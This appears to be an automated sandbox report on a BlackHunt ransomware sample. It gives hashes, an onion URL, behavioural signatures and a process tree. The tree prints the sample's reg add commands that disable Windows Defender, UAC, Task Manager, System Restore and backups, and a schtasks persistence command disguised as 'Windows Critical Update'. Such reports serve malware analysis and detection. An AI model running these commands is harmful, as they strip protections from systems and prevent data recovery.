Analysis
Max time kernel: 210s
Max time network: 159s
Platform: windows7_x64
Resource: win7-20231215-en
Resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
Submitted: 19/01/2024, 01:30
Static task: static1
Behavioral task: behavioral1
  Sample: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
  Resource: win10v2004-20231215-en
General
Target: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
Size: 707KB
MD5: 9f9ec6ddfa7450732ba4935648f34311
SHA1: 1cc97e28ecc0622db4eaa3e2bc5e246624b8c342
SHA256: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9
SHA512: 4ac8ce1e613d06ee64e7f4730cab082df67aecf2ead8a1377688a50c6e778dbdd0a848bf80bc8e115582c9459776b5948dc5689440833aeee689b9a504411f84
SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1y8Nvnh:6uaTmkZJ+naie5OTamgEoKxLWp5h
Malware Config
Extracted
Path: C:\ProgramData\#BlackHunt_ReadMe.hta
URL: http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures

Deletes NTFS Change Journal (2 TTPs, 1 IoC)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid | Process
556 | fsutil.exe

description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
pid | Process
2436 | bcdedit.exe
2004 | bcdedit.exe

Renames multiple (103) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

pid | Process
2380 | wbadmin.exe

Disables Task Manager via registry modification

Disables use of System Restore points (1 TTP)

Adds Run key to start application (2 TTPs, 1 IoC)
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" | reg.exe

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
Enumerates connected drives (3 TTPs, 25 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\B: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\W: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\P: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\K: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\V: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\H: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\Z: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\Q: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\Y: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\O: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\F: | vssadmin.exe
File opened (read-only) | \??\E: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\J: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\X: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\G: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\L: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\I: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\A: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\N: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\U: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\M: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\R: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\T: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\S: | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
File opened (read-only) | \??\F: | vssadmin.exe
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
2 | ip-api.com
Drops file in Program Files directory (64 IoCs)
Process for every entry: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
description | ioc
File created | C:\Program Files\7-Zip\#BlackHunt_Private.key
File created | C:\Program Files\DVD Maker\ja-JP\#BlackHunt_ReadMe.hta
File opened for modification | C:\Program Files\DenyCompress.wax
File created | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\#BlackHunt_Private.key
File opened for modification | C:\Program Files\7-Zip\Lang\mng2.txt
File created | C:\Program Files\DVD Maker\fr-FR\#BlackHunt_Private.key
File opened for modification | C:\Program Files\7-Zip\Lang\va.txt
File opened for modification | C:\Program Files\7-Zip\Lang\mk.txt
File created | C:\Program Files\DVD Maker\ja-JP\#BlackHunt_ReadMe.txt
File opened for modification | C:\Program Files\7-Zip\Lang\sq.txt
File opened for modification | C:\Program Files\7-Zip\Lang\ru.txt
File created | C:\Program Files\DVD Maker\Shared\#BlackHunt_Private.key
File created | C:\Program Files\DVD Maker\de-DE\#BlackHunt_Private.key
File opened for modification | C:\Program Files\7-Zip\7zCon.sfx
File opened for modification | C:\Program Files\7-Zip\Lang\da.txt
File opened for modification | C:\Program Files\7-Zip\Lang\fr.txt
File opened for modification | C:\Program Files\7-Zip\Lang\ka.txt
File opened for modification | C:\Program Files\7-Zip\Lang\pt-br.txt
File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv
File opened for modification | C:\Program Files\7-Zip\Lang\uz-cyrl.txt
File created | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_ReadMe.txt
File opened for modification | C:\Program Files\7-Zip\Lang\ca.txt
File opened for modification | C:\Program Files\7-Zip\Lang\ja.txt
File opened for modification | C:\Program Files\7-Zip\Lang\lt.txt
File opened for modification | C:\Program Files\7-Zip\Lang\lv.txt
File opened for modification | C:\Program Files\7-Zip\Lang\mn.txt
File opened for modification | C:\Program Files\7-Zip\Lang\uz.txt
File created | C:\Program Files\DVD Maker\#BlackHunt_ReadMe.txt
File opened for modification | C:\Program Files\7-Zip\Lang\ext.txt
File opened for modification | C:\Program Files\7-Zip\Lang\ga.txt
File opened for modification | C:\Program Files\7-Zip\Lang\he.txt
File opened for modification | C:\Program Files\7-Zip\Lang\nb.txt
File opened for modification | C:\Program Files\7-Zip\Lang\ps.txt
File opened for modification | C:\Program Files\7-Zip\Lang\pa-in.txt
File created | C:\Program Files\#BlackHunt_ReadMe.txt
File created | C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.txt
File created | C:\Program Files\DVD Maker\de-DE\#BlackHunt_ReadMe.txt
File opened for modification | C:\Program Files\7-Zip\Lang\is.txt
File opened for modification | C:\Program Files\7-Zip\Lang\kk.txt
File created | C:\Program Files\DVD Maker\it-IT\#BlackHunt_ReadMe.txt
File opened for modification | C:\Program Files\7-Zip\Lang\sr-spl.txt
File opened for modification | C:\Program Files\7-Zip\readme.txt
File created | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_Private.key
File opened for modification | C:\Program Files\7-Zip\History.txt
File opened for modification | C:\Program Files\7-Zip\Lang\bn.txt
File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png
File opened for modification | C:\Program Files\7-Zip\7-zip.chm
File opened for modification | C:\Program Files\7-Zip\Lang\sk.txt
File opened for modification | C:\Program Files\DVD Maker\rtstreamsink.ax
File created | C:\Program Files\DVD Maker\Shared\DvdStyles\#BlackHunt_ReadMe.hta
File opened for modification | C:\Program Files\7-Zip\Lang\br.txt
File opened for modification | C:\Program Files\7-Zip\Lang\ku-ckb.txt
File opened for modification | C:\Program Files\7-Zip\Lang\ku.txt
File opened for modification | C:\Program Files\7-Zip\Lang\sl.txt
File created | C:\Program Files\#BlackHunt_Private.key
File opened for modification | C:\Program Files\7-Zip\Lang\gu.txt
File opened for modification | C:\Program Files\7-Zip\Lang\ug.txt
File created | C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.hta
File opened for modification | C:\Program Files\7-Zip\Lang\kab.txt
File opened for modification | C:\Program Files\7-Zip\Lang\sv.txt
File opened for modification | C:\Program Files\7-Zip\Lang\sr-spc.txt
File opened for modification | C:\Program Files\DVD Maker\Shared\DissolveAnother.png
File created | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_ReadMe.hta
File opened for modification | C:\Program Files\7-Zip\Lang\en.ttt
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2864 | schtasks.exe

Interacts with shadow copies (2 TTPs, 5 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
1448 | vssadmin.exe
1824 | vssadmin.exe
2508 | vssadmin.exe
1752 | vssadmin.exe
2304 | vssadmin.exe
Modifies registry class (10 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2 | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2 | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ | reg.exe
Suspicious use of AdjustPrivilegeToken (13 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2560 | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
Token: SeRestorePrivilege | 2560 | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
Token: SeBackupPrivilege | 2560 | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
Token: SeTakeOwnershipPrivilege | 2560 | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
Token: SeAuditPrivilege | 2560 | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
Token: SeSecurityPrivilege | 2560 | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
Token: SeIncBasePriorityPrivilege | 2560 | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
Token: SeBackupPrivilege | 2024 | vssvc.exe
Token: SeRestorePrivilege | 2024 | vssvc.exe
Token: SeAuditPrivilege | 2024 | vssvc.exe
Token: SeBackupPrivilege | 2208 | wbengine.exe
Token: SeRestorePrivilege | 2208 | wbengine.exe
Token: SeSecurityPrivilege | 2208 | wbengine.exe
Suspicious use of WriteProcessMemory (64 IoCs)
pid 2560 and Process fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe for every entry; each line below is recorded four times in the report (16 targets x 4 = 64 IoCs).
description | procid_target
PID 2560 wrote to memory of 1108 | 29
PID 2560 wrote to memory of 1184 | 30
PID 2560 wrote to memory of 1940 | 31
PID 2560 wrote to memory of 1696 | 33
PID 2560 wrote to memory of 1436 | 34
PID 2560 wrote to memory of 880 | 38
PID 2560 wrote to memory of 664 | 39
PID 2560 wrote to memory of 548 | 40
PID 2560 wrote to memory of 988 | 41
PID 2560 wrote to memory of 1472 | 43
PID 2560 wrote to memory of 924 | 44
PID 2560 wrote to memory of 1984 | 46
PID 2560 wrote to memory of 1000 | 47
PID 2560 wrote to memory of 1036 | 48
PID 2560 wrote to memory of 1280 | 51
PID 2560 wrote to memory of 2512 | 52
System policy modification (1 TTP, 3 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

C:\Users\Admin\AppData\Local\Temp\fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe (PID:2560)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe"
  - UAC bypass
  - Checks whether UAC is enabled
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification

  C:\Windows\System32\cmd.exe (PID:1108)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

    C:\Windows\system32\reg.exe (PID:528)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      - Modifies registry class

  C:\Windows\System32\cmd.exe (PID:1184)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

    C:\Windows\system32\reg.exe (PID:2276)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Modifies registry class

  C:\Windows\System32\cmd.exe (PID:1940)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

    C:\Windows\system32\reg.exe (PID:1704)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
      - Modifies registry class

  C:\Windows\System32\cmd.exe (PID:1696)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

    C:\Windows\system32\reg.exe (PID:1992)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Modifies registry class

  C:\Windows\System32\cmd.exe (PID:1436)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

    C:\Windows\system32\reg.exe (PID:1532)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
      - Adds Run key to start application

  C:\Windows\System32\cmd.exe (PID:880)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe (PID:1712)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID:664)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe (PID:2220)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      - Modifies Windows Defender Real-time Protection settings

  C:\Windows\System32\cmd.exe (PID:548)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

    C:\Windows\system32\reg.exe (PID:1524)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

  C:\Windows\System32\cmd.exe (PID:988)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe (PID:2248)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID:1472)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

    C:\Windows\system32\reg.exe (PID:1956)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

  C:\Windows\System32\cmd.exe (PID:924)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

    C:\Windows\system32\reg.exe (PID:2148)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

  C:\Windows\System32\cmd.exe (PID:1984)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

    C:\Windows\system32\reg.exe (PID:2436)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

  C:\Windows\System32\cmd.exe (PID:1000)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

    C:\Windows\system32\reg.exe (PID:680)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

  C:\Windows\System32\cmd.exe (PID:1036)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe (PID:2004)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID:1280)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe (PID:2284)
      cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID:2512)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe (PID:864)
      cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID:536)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe (PID:1476)
      cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID:2932)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe (PID:1732)
      cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID:1796)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe (PID:2180)
      cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID:796)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe (PID:1724)
      cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID:276)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe (PID:1764)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID:1740)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe (PID:1936)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID:2256)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe (PID:1612)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID:1728)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe (PID:2136)
      cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe (PID:2076)
    cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2908
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2328
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:3012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2372
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:320
-
-
-
[depth 2] C:\Windows\System32\cmd.exe (PID 2856)
  "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe" /F
